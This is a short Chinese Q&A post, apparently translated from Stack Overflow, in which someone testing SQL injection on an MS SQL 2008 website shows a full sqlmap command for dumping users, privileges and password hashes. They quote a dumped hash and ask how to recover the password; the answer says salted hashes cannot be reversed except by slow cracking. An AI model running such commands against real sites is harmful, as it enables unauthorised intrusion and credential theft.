我研究SQLInjection在一个使用Microsoft SQL Server 2008的网站上测试它。
sqlmap-dev$ python sqlmap.py -u "https://site?id=239" --current-user --current-db -b --users --privileges --passwords
接收用户登录和哈希密码:
喜欢这样: 0x01005847e7a1ffa21b9c6811420f0e502612c8dd976f685f63a6
问题是,我怎么知道呢?
我明白我无法真正反转哈希字符串。
我找到了这个:https://stackoverflow.com/a/18154134/2264941
据我所知:
0x0100 - use SHA1
5847e7a1 - salt
ffa21b9c6811420f0e502612c8dd976f685f63a6 - hashed password with salt
这个算法对MS SQL 2008是否正确? 也许有一些在线乐器可以帮助我?
答案 0 :(得分:0)
你不能这样做。这实际上是散列和腌制的全部要点......你可以试一下密码破解器,但这需要很长时间。